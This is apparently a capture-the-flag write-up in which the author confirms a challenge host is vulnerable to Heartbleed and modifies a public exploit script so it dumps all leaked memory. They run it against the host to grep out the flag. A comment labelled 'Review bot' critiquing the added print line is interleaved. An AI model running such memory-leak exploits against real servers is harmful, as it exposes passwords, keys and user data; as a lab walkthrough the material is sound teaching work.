Back up now! Hopefully for good.
Our hearts are bleeding. But instead of bleeding password bytes, they’re bleeding flags. Please recover our flags so we don’t bleed to death before we can update to 1.0.1-g. Site is up at https://54.82.147.138:45373
According to the name of the challenge, we have a CVE-2014-0160-vulnerable host. Let's check it with heartbleed-test.
So we can dump the memory of the vulnerable server. To do this, I chose Samiux's version of the Heartbleed exploit. It looks for interesting information in a memory dump, but since we'd better get all the memory, let's change the code a bit.
➜ heartbleed diff -p heartbleed-samiux-orig.py heartbleed-samiux.py *** heartbleed-samiux-orig.py 2014-04-14 11:35:26.000000000 +0300 --- heartbleed-samiux.py 2014-04-14 11:37:49.000000000 +0300 *************** class HeartBleeder(object): *** 137,142 **** --- 137,143 ---- return None rdata += data remain -= len(data) + print rdata return rdata def try_heartbeat(self, hb):
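Review bot: `print rdata`, added just before `return rdata`, unconditionally writes every received buffer to stdout as raw bytes, so unprintable data reaches the terminal and ends up in scrollback or any redirected log. Gate it behind a verbose or debug option and emit `repr(rdata)` or a hex encoding instead. The statement form of `print` also ties the script to Python 2, and the added line has no comment saying it is a temporary debugging change.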
➜ heartbleed python heartbleed-samiux.py 54.82.147.138 -p 45373 | grep flag @flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}
The flag is hey_guise_we_made_a_heartbleed.